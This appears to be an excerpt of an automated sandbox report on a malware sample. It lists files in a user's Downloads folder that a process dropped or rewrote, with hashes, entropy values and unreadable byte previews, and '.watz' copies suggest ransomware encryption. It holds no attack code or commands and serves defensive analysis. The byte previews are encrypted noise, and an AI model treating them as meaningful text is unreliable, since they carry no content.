Preview:	KATAX....VkY8..M..tY...`.JX..,D..d=_fs..0.......W.....&.M.>.0,j3....u.]ay.b.`y...O.a....b..O.._5.=.t..&ct.....$".S...'.Fk.....}.........m..B............k.ib.?.Q...,.e.WZ.K.Zv..z5.d.U...Sl...5.B)<..&...P...{.'7.Py.....H.@X....u..t......5M..i'T+.'...:.3UU..0c.b.....I..j.n....d..A..@.J....z.^N..-}..t.'..^...K.&._....k[.V\.N8......o..$rL........0k....N>...^..b..R.F?.rH..r..O...-`.w.Q.#.....QA.l.3......^j.F...j...^G.....A.o[...Gb.....P,oKT..f.H.I..Z.R.m..~.n...J..].y:k.{Yx..k...O..N.i.....u.Jr.AH..s.;..<\|Iz+.(....E$2'...r>..^;...GD..y...W.MP.(y......e...0.L.B.S.....4...y.vtv'.q..u.#U..kW%.Zy....W.........?...N....w.y....P..`...`]....0...-.-+.....}YzoK.4..w..a...eF.).....S#QXz.Ae....z..\.k.'...T".Gb!..........oQ..okr%..LQ?.vs.OaHz.....H......@.^e...c..B.);.1.u.J.4.....Cd.......{O....j.$....L...R ....\|.{.........'/.&.x{.B.\.ugJ...E.n.J....\|D.....d....Z..$&S.}d.7.....@e(,.AXY.B....U.... ...FE....O..}.YrZa..../F.wX.K9.sP`a..O..-9NE.KW.e....GB.....FKK.gi.

C:\Users\user\Downloads\KATAXZVCPS.jpg.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8179148665836555
Encrypted:	false
SSDEEP:	24:7angJxW5VLe9RiNFcJ3H5eUWZ1QseB67WEbS38zOTU1iR/lRGpsCp1KrGjbD:7BqVLwcFQ35eUWOB6rSszO7R/TGR7caD
MD5:	33291E6DE782761D7941E76F146111E7
SHA1:	A1892847AC01536639B5CC246EACAC486335D645
SHA-256:	5EE8A4E3DB6AF93E02402D6F193D991868FC2F22C5B718999E2409B01934E790
SHA-512:	169E897334FB7FC8F61CD18F7E43E2B3CE4B3EF984D7598A05B11740A7F3B8EF9D700756C357D4361CBB1830CC75F856BA3E45DFBC148A66D824F34CD696A4E3
Malicious:	false
Preview:	KATAX....VkY8..M..tY...`.JX..,D..d=_fs..0.......W.....&.M.>.0,j3....u.]ay.b.`y...O.a....b..O.._5.=.t..&ct.....$".S...'.Fk.....}.........m..B............k.ib.?.Q...,.e.WZ.K.Zv..z5.d.U...Sl...5.B)<..&...P...{.'7.Py.....H.@X....u..t......5M..i'T+.'...:.3UU..0c.b.....I..j.n....d..A..@.J....z.^N..-}..t.'..^...K.&._....k[.V\.N8......o..$rL........0k....N>...^..b..R.F?.rH..r..O...-`.w.Q.#.....QA.l.3......^j.F...j...^G.....A.o[...Gb.....P,oKT..f.H.I..Z.R.m..~.n...J..].y:k.{Yx..k...O..N.i.....u.Jr.AH..s.;..<\|Iz+.(....E$2'...r>..^;...GD..y...W.MP.(y......e...0.L.B.S.....4...y.vtv'.q..u.#U..kW%.Zy....W.........?...N....w.y....P..`...`]....0...-.-+.....}YzoK.4..w..a...eF.).....S#QXz.Ae....z..\.k.'...T".Gb!..........oQ..okr%..LQ?.vs.OaHz.....H......@.^e...c..B.);.1.u.J.4.....Cd.......{O....j.$....L...R ....\|.{.........'/.&.x{.B.\.ugJ...E.n.J....\|D.....d....Z..$&S.}d.7.....@e(,.AXY.B....U.... ...FE....O..}.YrZa..../F.wX.K9.sP`a..O..-9NE.KW.e....GB.....FKK.gi.

C:\Users\user\Downloads\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840556816813328
Encrypted:	false
SSDEEP:	24:DOX1jO9koUTGI3jRHI7xmZjP+uVAHUYpIauD9wgNNsKPvcEObD:DoSaOoBDdPRAHUYCauDukPvcEsD
MD5:	F43593D2FA1D5CDD090F8601DB532197
SHA1:	4228E3428481ED36DA68C24D0DBBCC546EAB3870
SHA-256:	16D10FBF3D533C5EBEB42A775BD4E0467DAE1AF95CD186A5F5DF27E8566ADB4E
SHA-512:	33CC050233CC3CFCF47A7B9DD6728971BBF256FC437ADCA731C6796C2F3BEBD64394405D7F821CAD9FB822A80CAF2C21BB4546BF117739D0913FB3A50DCA7426
Malicious:	false
Preview:	KATAX.9.qgO[kM.8VT..o..i..v..g9.../..j.sQav.PE.O..!...O.7k.!L...H..&...+.J."....7.,M.....H4.b..#..C.D.N>.RE..@.U........Q....R^......LX.b:.Tf]..zp...<.......o..-...'g...V..Rt..&B.....7...4...qL..9....$....^U\|.C..S......Y.H..t.Y.i.....l..).....f.J%..$....[...Nl.-%T..5...g...gC/.p.....]..z.A......%...c.}%.u.4_X\V...H.o..J....s4..m:.k...O..O.=.3[...Eh%3M.e...h..\|.............nA+.5....F..S..k.......h....W.HX.9u...aT,.7VD0hk5.>..n7..............IrY...........4..z#Z..A.X.0...Y{..a......f.f.....s ..T~.>@...oC.h..x..T.[^....(.bo. ...+$..t....s!...S..5..]}._`...j..g.e.....m.4g.p<,h.............Z....E...=k}.......qI...n.>-.8R.QQ....:$.%v.I..6{*wL.Cd..M.b7X>......h..L,....x....kH....b...A;[r.bbg..bK%..^..o.....o..W.....sQD..6x......[.i\|..F{..9...Pc%.......Ng..S...%&P...#\|...n..)~.4.c.j...k...,...:...&.....h.n...sr........ie..._T.n.x".....ET..h....E.%..I...@..SG..8.....u.u...G{.d...:.h...#.09X.....b...Z..m...>S........'B`X.~..c.l.O@9..-0..

C:\Users\user\Downloads\KATAXZVCPS.xlsx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840556816813328
Encrypted:	false
SSDEEP:	24:DOX1jO9koUTGI3jRHI7xmZjP+uVAHUYpIauD9wgNNsKPvcEObD:DoSaOoBDdPRAHUYCauDukPvcEsD
MD5:	F43593D2FA1D5CDD090F8601DB532197
SHA1:	4228E3428481ED36DA68C24D0DBBCC546EAB3870
SHA-256:	16D10FBF3D533C5EBEB42A775BD4E0467DAE1AF95CD186A5F5DF27E8566ADB4E
SHA-512:	33CC050233CC3CFCF47A7B9DD6728971BBF256FC437ADCA731C6796C2F3BEBD64394405D7F821CAD9FB822A80CAF2C21BB4546BF117739D0913FB3A50DCA7426
Malicious:	false
Preview:	KATAX.9.qgO[kM.8VT..o..i..v..g9.../..j.sQav.PE.O..!...O.7k.!L...H..&...+.J."....7.,M.....H4.b..#..C.D.N>.RE..@.U........Q....R^......LX.b:.Tf]..zp...<.......o..-...'g...V..Rt..&B.....7...4...qL..9....$....^U\|.C..S......Y.H..t.Y.i.....l..).....f.J%..$....[...Nl.-%T..5...g...gC/.p.....]..z.A......%...c.}%.u.4_X\V...H.o..J....s4..m:.k...O..O.=.3[...Eh%3M.e...h..\|.............nA+.5....F..S..k.......h....W.HX.9u...aT,.7VD0hk5.>..n7..............IrY...........4..z#Z..A.X.0...Y{..a......f.f.....s ..T~.>@...oC.h..x..T.[^....(.bo. ...+$..t....s!...S..5..]}._`...j..g.e.....m.4g.p<,h.............Z....E...=k}.......qI...n.>-.8R.QQ....:$.%v.I..6{*wL.Cd..M.b7X>......h..L,....x....kH....b...A;[r.bbg..bK%..^..o.....o..W.....sQD..6x......[.i\|..F{..9...Pc%.......Ng..S...%&P...#\|...n..)~.4.c.j...k...,...:...&.....h.n...sr........ie..._T.n.x".....ET..h....E.%..I...@..SG..8.....u.u...G{.d...:.h...#.09X.....b...Z..m...>S........'B`X.~..c.l.O@9..-0..

C:\Users\user\Downloads\NWTVCDUMOB.jpg

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.833898517679141
Encrypted:	false
SSDEEP:	24:b0qQroVpOJvuX3dZMYiJPkDhdqE3lChnXuwDQBh//Kd1TACEwqW6V/kAd5vKewMT:b0qSIpOJvuX38YKKhMFhnRDQLqQ3V82/
MD5:	EE9306DC6575602EFC57D5639D0C56A3
SHA1:	F9A2A6F5B516FD9224197F044FC282354226AF1A
SHA-256:	C6D2B4EB901015C87C83C8402A9FBA071A4E93D9ACD038A17DF4702BAF77D68E
SHA-512:	1258DDE85118184424EBEF93749B08969AED0EC9586E9FE84EE81BB98964780E6B8902994F30498DF7BB30AB346BB2ACBBBF15419595E7B9C59FC25F4CAFDB11
Malicious:	false
Preview:	NWTVC..,...........J....-...qT..-....3q?A..!....O..O!..Y.Ezr...L.4.....W'7\Io.K&:]>....(..:>.',...W]?..t...l0....;N~......~J......^........p........L.w.HB.ERol~....X.7.O.&.$..l......(n..Y..... B.??N.....zI./......P+K.....g....=..i..l...U..v.i..p....W.].-.....1..SQS...C.q..(4.cy.BH.5c+.4.].......E...d.~....b.".u..2k..C.....=.9.....KR.n.5.hP(.m.~..[......n.5..}......T...........;t..\|..i..n..8Rh.J....L........b...t?a....g....L.....c?.l>.....34..'...$.y...9....eB.`....o. .%.x<..yt.,.5.1.....`....`i...#..-.Y\|......@..._C..h........p.T.T..q.A......>....s..\|.f.O.}.}.2...}'.....%..G....0{l....9...A]F....7.i....G._.ba.o....2 ....M..i....@....a.xx.[.c..p}......N...@...'.....D.,p.F(...IE.@.v.AR......F)+..5...E.SK8....@.o4N....+:d(]...}.U..l..r..D.-....0JA^.Q.`1....\|W.).4...@.3l.?j..\|..q..G.D........3.Z........<q3k...,.....!.xT....B....j}O.;nRE..A\|......w?.......2.r.}.\|K..B...6..v...@kpr......v@R.'S>$......+.V..`..j....#....M..[.....W.Fv.=.

C:\Users\user\Downloads\NWTVCDUMOB.jpg.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.833898517679141
Encrypted:	false
SSDEEP:	24:b0qQroVpOJvuX3dZMYiJPkDhdqE3lChnXuwDQBh//Kd1TACEwqW6V/kAd5vKewMT:b0qSIpOJvuX38YKKhMFhnRDQLqQ3V82/
MD5:	EE9306DC6575602EFC57D5639D0C56A3
SHA1:	F9A2A6F5B516FD9224197F044FC282354226AF1A
SHA-256:	C6D2B4EB901015C87C83C8402A9FBA071A4E93D9ACD038A17DF4702BAF77D68E
SHA-512:	1258DDE85118184424EBEF93749B08969AED0EC9586E9FE84EE81BB98964780E6B8902994F30498DF7BB30AB346BB2ACBBBF15419595E7B9C59FC25F4CAFDB11
Malicious:	false
Preview:	NWTVC..,...........J....-...qT..-....3q?A..!....O..O!..Y.Ezr...L.4.....W'7\Io.K&:]>....(..:>.',...W]?..t...l0....;N~......~J......^........p........L.w.HB.ERol~....X.7.O.&.$..l......(n..Y..... B.??N.....zI./......P+K.....g....=..i..l...U..v.i..p....W.].-.....1..SQS...C.q..(4.cy.BH.5c+.4.].......E...d.~....b.".u..2k..C.....=.9.....KR.n.5.hP(.m.~..[......n.5..}......T...........;t..\|..i..n..8Rh.J....L........b...t?a....g....L.....c?.l>.....34..'...$.y...9....eB.`....o. .%.x<..yt.,.5.1.....`....`i...#..-.Y\|......@..._C..h........p.T.T..q.A......>....s..\|.f.O.}.}.2...}'.....%..G....0{l....9...A]F....7.i....G._.ba.o....2 ....M..i....@....a.xx.[.c..p}......N...@...'.....D.,p.F(...IE.@.v.AR......F)+..5...E.SK8....@.o4N....+:d(]...}.U..l..r..D.-....0JA^.Q.`1....\|W.).4...@.3l.?j..\|..q..G.D........3.Z........<q3k...,.....!.xT....B....j}O.;nRE..A\|......w?.......2.r.}.\|K..B...6..v...@kpr......v@R.'S>$......+.V..`..j....#....M..[.....W.Fv.=.

C:\Users\user\Downloads\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859966563082171
Encrypted:	false
SSDEEP:	24:0uJYVXf8YgzDNbMufi6Vc0IlVrYOuyay1d0AtNzx4LV/hiCo+UDyIFjhDuBeHOGs:0uJ0kYgztxVEDtuHOJtvGVJi9r2IFF6J
MD5:	56DDE12F1384B2258E61C4FE8907392F
SHA1:	880AF349EDEB89928624FF4BD90BE7200589F17C
SHA-256:	DD8DF67E3776248F7E95FD5683C829CBB8E8662A6BBD6C9D3FBA316FA44DE880
SHA-512:	9713855E92847669E4F50A2A4C966665D8F9A70688FC0B60733DF4646A827C167F888D86DD2092C4DBE0C11E76B5547A37B8FD977E876A1793F088C8B4BF0C28
Malicious:	false
Preview:	ONBQCJ7......W..Y...4...$..\|..9W..../V...(Q.p9.o.2.B..Q.><.y..{.Z....a.~`;J...1...A...0.......H...7.E.`.&.... ..#X..^r.h..9&..l..@.....\A.../...\|.q.........cP...{.=G.{SH....bdS.)V.....o.....GXP....d..X..-........t&K...#.....&-.G..Y.X.....~.{..gh\m.M.@.+qs.n...K.....g.8..f.....=Q...$.4.O.6/...^1....v..W.......;.......ue%w}..S.......f....fk....oIz>@..zQcV>{..e.`.6x..H....x...52.&C.Mb..P?._O..0[.F...K..z....k..5./.+{=.&..UV.d.x...}.{.+m..}4.a.7.:l.....v..b.%..]k...u...Z..J.V_n..k..~.[7vE.?..;.Z.Yg.[c..).X6...X..mr1...."......K.MA(I>&^.x..P.Z.D^..>......L...v}ro-UX..F./.v`..rP..b.k.P...9g.e........{%\|.z..}cb.....`=.....'.K..{.z....NV.H8~...<V6.]..>.D...n..%Bq...../.',,.....C..C.j...b..L.... ...kl..Kx.......&2.%..N.$.".A......+.....(........5....".....E4tNt9N.{....n.Z.'fl.....fx......=,.5.<..e.a..[m..O.X.YJ#".qq..+........../...w..bC.....^V.QY.a6.....?].O......s.&)E.#.E_......AMh.......h.6..l..B..........LxU)....LC.C=\|.\|..R..'.6.q

C:\Users\user\Downloads\ONBQCLYSPU.docx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859966563082171
Encrypted:	false
SSDEEP:	24:0uJYVXf8YgzDNbMufi6Vc0IlVrYOuyay1d0AtNzx4LV/hiCo+UDyIFjhDuBeHOGs:0uJ0kYgztxVEDtuHOJtvGVJi9r2IFF6J
MD5:	56DDE12F1384B2258E61C4FE8907392F
SHA1:	880AF349EDEB89928624FF4BD90BE7200589F17C
SHA-256:	DD8DF67E3776248F7E95FD5683C829CBB8E8662A6BBD6C9D3FBA316FA44DE880
SHA-512:	9713855E92847669E4F50A2A4C966665D8F9A70688FC0B60733DF4646A827C167F888D86DD2092C4DBE0C11E76B5547A37B8FD977E876A1793F088C8B4BF0C28
Malicious:	false
Preview:	ONBQCJ7......W..Y...4...$..\|..9W..../V...(Q.p9.o.2.B..Q.><.y..{.Z....a.~`;J...1...A...0.......H...7.E.`.&.... ..#X..^r.h..9&..l..@.....\A.../...\|.q.........cP...{.=G.{SH....bdS.)V.....o.....GXP....d..X..-........t&K...#.....&-.G..Y.X.....~.{..gh\m.M.@.+qs.n...K.....g.8..f.....=Q...$.4.O.6/...^1....v..W.......;.......ue%w}..S.......f....fk....oIz>@..zQcV>{..e.`.6x..H....x...52.&C.Mb..P?._O..0[.F...K..z....k..5./.+{=.&..UV.d.x...}.{.+m..}4.a.7.:l.....v..b.%..]k...u...Z..J.V_n..k..~.[7vE.?..;.Z.Yg.[c..).X6...X..mr1...."......K.MA(I>&^.x..P.Z.D^..>......L...v}ro-UX..F./.v`..rP..b.k.P...9g.e........{%\|.z..}cb.....`=.....'.K..{.z....NV.H8~...<V6.]..>.D...n..%Bq...../.',,.....C..C.j...b..L.... ...kl..Kx.......&2.%..N.$.".A......+.....(........5....".....E4tNt9N.{....n.Z.'fl.....fx......=,.5.<..e.a..[m..O.X.YJ#".qq..+........../...w..bC.....^V.QY.a6.....?].O......s.&)E.#.E_......AMh.......h.6..l..B..........LxU)....LC.C=\|.\|..R..'.6.q

C:\Users\user\Downloads\UMMBDNEQBN.docx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838817274456797
Encrypted:	false
SSDEEP:	24:0/xM1JWmKNBUhw8AByfI2B+Uq91cBOKB/BvuO70AdydLvisCacGqK/CMOc0bD:0pM1JWmcUhjHVgUqWOS/luO70Au6sCbR
MD5:	AB5D6761A6C65FFE56C1E9426464306A
SHA1:	E1A4E1368B5FB6B90F75A4E9B3BFF6C4D7F13BA0
SHA-256:	9C7DB9C1759266B78DA226D666C27D9665618B0C1960EDB7CE6B032CE1089B58
SHA-512:	DD05D7CEE0E2DCCAAAADDCD54584DFA56AF1A78FF58E0EE76C705F0325D2C2F5EE052135C5E0305F306BD134378B56C0CB9E2068CF470718A817DF0FFEA3B374
Malicious:	false
Preview:	UMMBD...#......G..AZYGE..i...&.A..}>.P..J.[....W.k.q...L. L.]...^....$........I..#.V...Hw}I.8..dD.S6...D.=.!...N...\|#..Mb..-..'.5.EX...g]s...$.T./\.'l..>.....g.f...."naq..3..vl.{Q..hTy/...t....`c...P...b.!..[.f.q.e.e..m.H.b...BLk.W..e.k....i\|xl..g...T..Y...7..:]9D....M......o./.x.L...P....DfO..+W...........$`.......X......H.@l..eSY.4.&h)$...}~/..\W..S..IL\|.....l4.7@.\|.NQ......_.>.e;8.&>."k5.@..?........x..=..G......vN.q..</..Y....o.cfw..m.......jb..:...[.7...._oj.8..2.Y?...?...[.aAo0........6.....3.3.Pb).i....RJ...e=.n.q.Y(`....].......F.m.7....\4a.C......T..s.......,.y......P.0...b~\...[.0...b.....h..r]@.'/.x.X...]F.:z]...L...C?.k^..$c.n.C...P4Y....uE.9.......p.....'^..g.!.....G.{..o....\..8/..-m..eG.....x$....B.r...^Nb-.k....Km..I.rq..wpwk;.s.;f.k.k....:..I....=........B..M..NM...b.=;...7..M\|@.......;Q.......Ut..;..!.P.hm.....e....U09...a9.)............D.K.$..,..GP...c...p.....m.i..0.....h.N.\|.[A:.d..yag6`.V..=.........\5i

C:\Users\user\Downloads\UMMBDNEQBN.docx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838817274456797
Encrypted:	false
SSDEEP:	24:0/xM1JWmKNBUhw8AByfI2B+Uq91cBOKB/BvuO70AdydLvisCacGqK/CMOc0bD:0pM1JWmcUhjHVgUqWOS/luO70Au6sCbR
MD5:	AB5D6761A6C65FFE56C1E9426464306A
SHA1:	E1A4E1368B5FB6B90F75A4E9B3BFF6C4D7F13BA0
SHA-256:	9C7DB9C1759266B78DA226D666C27D9665618B0C1960EDB7CE6B032CE1089B58
SHA-512:	DD05D7CEE0E2DCCAAAADDCD54584DFA56AF1A78FF58E0EE76C705F0325D2C2F5EE052135C5E0305F306BD134378B56C0CB9E2068CF470718A817DF0FFEA3B374
Malicious:	false
Preview:	UMMBD...#......G..AZYGE..i...&.A..}>.P..J.[....W.k.q...L. L.]...^....$........I..#.V...Hw}I.8..dD.S6...D.=.!...N...\|#..Mb..-..'.5.EX...g]s...$.T./\.'l..>.....g.f...."naq..3..vl.{Q..hTy/...t....`c...P...b.!..[.f.q.e.e..m.H.b...BLk.W..e.k....i\|xl..g...T..Y...7..:]9D....M......o./.x.L...P....DfO..+W...........$`.......X......H.@l..eSY.4.&h)$...}~/..\W..S..IL\|.....l4.7@.\|.NQ......_.>.e;8.&>."k5.@..?........x..=..G......vN.q..</..Y....o.cfw..m.......jb..:...[.7...._oj.8..2.Y?...?...[.aAo0........6.....3.3.Pb).i....RJ...e=.n.q.Y(`....].......F.m.7....\4a.C......T..s.......,.y......P.0...b~\...[.0...b.....h..r]@.'/.x.X...]F.:z]...L...C?.k^..$c.n.C...P4Y....uE.9.......p.....'^..g.!.....G.{..o....\..8/..-m..eG.....x$....B.r...^Nb-.k....Km..I.rq..wpwk;.s.;f.k.k....:..I....=........B..M..NM...b.=;...7..M\|@.......;Q.......Ut..;..!.P.hm.....e....U09...a9.)............D.K.$..,..GP...c...p.....m.i..0.....h.N.\|.[A:.d..yag6`.V..=.........\5i

C:\Users\user\Downloads\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836039747366932
Encrypted:	false
SSDEEP:	24:WghsHiV2A5/asL3CuvdH7EXLeUyjhslSo2yWdlwVSrfQcx2iTjsmpog/gvT7e46X:RyVAbLyANQJ4slSoLWdlkScIjsx8gvTU
MD5:	B3C9390CC5147B0F2852489FD5A70068
SHA1:	33E66B40BA6B5660F642FC661E0007B5CB1B54CA
SHA-256:	518BD29B784BCC6905AB239AABA5B3C23E94AD7E6D524DF5122CA7D5406D1ABC
SHA-512:	C151D8AC1532F0A00407D82B41A426BEC6EA2021D64964DDD4DB7EDBFF820CD689E294CFFD5A68AA7FE927DEAC23D8CC17CA1CCDDA645A0DFD130F15B3ED6C60
Malicious:	false
Preview:	UMMBD.....~D......_..=#p.l.#.>...B.>.1...d.S..`2./%..e:~...`S..PU$M}Z..M...J..:...1....7...]=`.Z....).R9..b...E..r.Q.G....b..'....j.YO.s...<..1...^..5.6."...z.kxIWR.....b.w.=....o..\|~.I8.O...HP@w...&j3.'.....8.....=.:....l.Q...d.W...y.`r.4.T.G...\|.Q.v......6.'7.u.."$SJ.w...b...hr/.K().B.6.....7......7.%.d..[.C...]u%..e.......z...%.....Y12C...a.%....0.......)I.~.........\|.'.....,...T<.X.v....S...`r.p..............M..)..)......Q....>....w5.819....t....U.Eo.M...#1n@.=(9.............k..,O..T.?\|R./_.l....2....B.....&~6O..}.S.......[..l.lK..e~..6.OSuP.<.$=.J!$X.....<]....&c.G...6r$....Y.w....hE......5.d....._...8..3}..?{N...A?.dzn...........Y..x.P..5..........>....L<..G...G&....."#.].ayM......H...".....J`%.87.7...>.o.G.u0..s..Nc8..u}..../.I...7@........#....a..c...............G...s.G......6y .....k.....~f.9.<....$wm..D.k~..f...1 ..[.Kd.'.g.4.>.].....\|..\|}.3....l;Bl.}y..f......#..b....../1/G.T9.L. ..0./..]B*.t.R....;...........`..z..HTMy..T.=.

C:\Users\user\Downloads\UMMBDNEQBN.pdf.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836039747366932
Encrypted:	false
SSDEEP:	24:WghsHiV2A5/asL3CuvdH7EXLeUyjhslSo2yWdlwVSrfQcx2iTjsmpog/gvT7e46X:RyVAbLyANQJ4slSoLWdlkScIjsx8gvTU
MD5:	B3C9390CC5147B0F2852489FD5A70068
SHA1:	33E66B40BA6B5660F642FC661E0007B5CB1B54CA
SHA-256:	518BD29B784BCC6905AB239AABA5B3C23E94AD7E6D524DF5122CA7D5406D1ABC
SHA-512:	C151D8AC1532F0A00407D82B41A426BEC6EA2021D64964DDD4DB7EDBFF820CD689E294CFFD5A68AA7FE927DEAC23D8CC17CA1CCDDA645A0DFD130F15B3ED6C60
Malicious:	false
Preview:	UMMBD.....~D......_..=#p.l.#.>...B.>.1...d.S..`2./%..e:~...`S..PU$M}Z..M...J..:...1....7...]=`.Z....).R9..b...E..r.Q.G....b..'....j.YO.s...<..1...^..5.6."...z.kxIWR.....b.w.=....o..\|~.I8.O...HP@w...&j3.'.....8.....=.:....l.Q...d.W...y.`r.4.T.G...\|.Q.v......6.'7.u.."$SJ.w...b...hr/.K().B.6.....7......7.%.d..[.C...]u%..e.......z...%.....Y12C...a.%....0.......)I.~.........\|.'.....,...T<.X.v....S...`r.p..............M..)..)......Q....>....w5.819....t....U.Eo.M...#1n@.=(9.............k..,O..T.?\|R./_.l....2....B.....&~6O..}.S.......[..l.lK..e~..6.OSuP.<.$=.J!$X.....<]....&c.G...6r$....Y.w....hE......5.d....._...8..3}..?{N...A?.dzn...........Y..x.P..5..........>....L<..G...G&....."#.].ayM......H...".....J`%.87.7...>.o.G.u0..s..Nc8..u}..../.I...7@........#....a..c...............G...s.G......6y .....k.....~f.9.<....$wm..D.k~..f...1 ..[.Kd.'.g.4.>.].....\|..\|}.3....l;Bl.}y..f......#..b....../1/G.T9.L. ..0./..]B*.t.R....;...........`..z..HTMy..T.=.

C:\Users\user\Downloads\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.834555752513442
Encrypted:	false
SSDEEP:	24:rrHoPAXadlsNL9AIMtvl4sJfRVuISKRZ+r4sIWLiRTXb9fXuYyTjA8gbu9VTDeU7:rboraL9+mKuISKTB/VXpX/yvA8gKpD
MD5:	7B4260A822038FA45AE6F9E4494CBE2D
SHA1:	59BE274199AB099FB25F2611F052114F73D9E393
SHA-256:	BF1D0799476D52F03272E9E1D1BE62882A9FF1E9C19FF65AD98361862D184E39
SHA-512:	B5B571AF0DF852CFD9F07EC69333AF01D0C4EB90F980414BC7F17C4830CEA30E0CC52E70EA61A73673AE9791B0D7FC0C8149E1D9666A5AFB007DB8896952766B
Malicious:	false
Preview:	VLZDG..80.06.I>X<cG.D.`.E.Arn...#c.8..O8."..n7}O}.X....... .N..kL).}S.A........`.0.........G.M.56N.<:\..Q'.....$...\\..T..n....'..f...@.Ec.Q.n...k`..!.,...Q.......:..n......l............9.&.G..`..Tl .kt...\|.H.....q..:...:..B..#,./.8c.yA..[....3...x...]-..s..!..aBL{.T!...?..9T..hx[....b.....:.2.y{.. .......M...i.i.y.t......p..e...S&.=A..<..1;]...W.D."!~..2.tH..R...._\|.9..[...,_.......UZ.2..DQ.!..~(2...k.7...m..0U?.j.l...?.4#]4..D.'z...L.{@E88.p..G..n..PBC.1.}.w{.<,.%...I.T....e....".d....5..........ux....}..x.a?.i.VA.3.t.?......P...\...`-.~n.......~.....A.\|.X_.miv.7.Y.N..Y4..[<.YR.6.(EN.../...Z5......;B.. .D...... L.......z..i.hS..F+......r.mw......K.:..?.i+.....[.B..u\|.>.-F..ZM;....PZ...%.....F.....0.....8.8..Y..)V+.l8..bp~.D.x4.G&.F....\|.>..2..... ....<..-..J5;=vy.S.C..;........[..8.....9..t.42..[..*...q.7.N.....m.1.?3vm..d..X7Z..@.GR....../...tB..../...+...a].44....Q.%.......Q..../3..j..]..4..B..m.IL..7.}?s.eS.<2..Tp1..T......

C:\Users\user\Downloads\VLZDGUKUTZ.docx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.834555752513442
Encrypted:	false
SSDEEP:	24:rrHoPAXadlsNL9AIMtvl4sJfRVuISKRZ+r4sIWLiRTXb9fXuYyTjA8gbu9VTDeU7:rboraL9+mKuISKTB/VXpX/yvA8gKpD
MD5:	7B4260A822038FA45AE6F9E4494CBE2D
SHA1:	59BE274199AB099FB25F2611F052114F73D9E393
SHA-256:	BF1D0799476D52F03272E9E1D1BE62882A9FF1E9C19FF65AD98361862D184E39
SHA-512:	B5B571AF0DF852CFD9F07EC69333AF01D0C4EB90F980414BC7F17C4830CEA30E0CC52E70EA61A73673AE9791B0D7FC0C8149E1D9666A5AFB007DB8896952766B
Malicious:	false
Preview:	VLZDG..80.06.I>X<cG.D.`.E.Arn...#c.8..O8."..n7}O}.X....... .N..kL).}S.A........`.0.........G.M.56N.<:\..Q'.....$...\\..T..n....'..f...@.Ec.Q.n...k`..!.,...Q.......:..n......l............9.&.G..`..Tl .kt...\|.H.....q..:...:..B..#,./.8c.yA..[....3...x...]-..s..!..aBL{.T!...?..9T..hx[....b.....:.2.y{.. .......M...i.i.y.t......p..e...S&.=A..<..1;]...W.D."!~..2.tH..R...._\|.9..[...,_.......UZ.2..DQ.!..~(2...k.7...m..0U?.j.l...?.4#]4..D.'z...L.{@E88.p..G..n..PBC.1.}.w{.<,.%...I.T....e....".d....5..........ux....}..x.a?.i.VA.3.t.?......P...\...`-.~n.......~.....A.\|.X_.miv.7.Y.N..Y4..[<.YR.6.(EN.../...Z5......;B.. .D...... L.......z..i.hS..F+......r.mw......K.:..?.i+.....[.B..u\|.>.-F..ZM;....PZ...%.....F.....0.....8.8..Y..)V+.l8..bp~.D.x4.G&.F....\|.>..2..... ....<..-..J5;=vy.S.C..;........[..8.....9..t.42..[..*...q.7.N.....m.1.?3vm..d..X7Z..@.GR....../...tB..../...+...a].44....Q.%.......Q..../3..j..]..4..B..m.IL..7.}?s.eS.<2..Tp1..T......

C:\Users\user\Downloads\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830985435418595
Encrypted:	false
SSDEEP:	24:jog1T/+KHB2xhPtjb0fKA5aOoE/OEFdaaquz+AtLApR7+gm5kedWVraVwXKvGGjX:p1TGa2z5b0f4s/Fyu6aA4lOraVwXKLD
MD5:	CB3221A2C433F711A98E40E6DB5D6204
SHA1:	92736EF67BCF27577589E8E60E565C882FFE150F
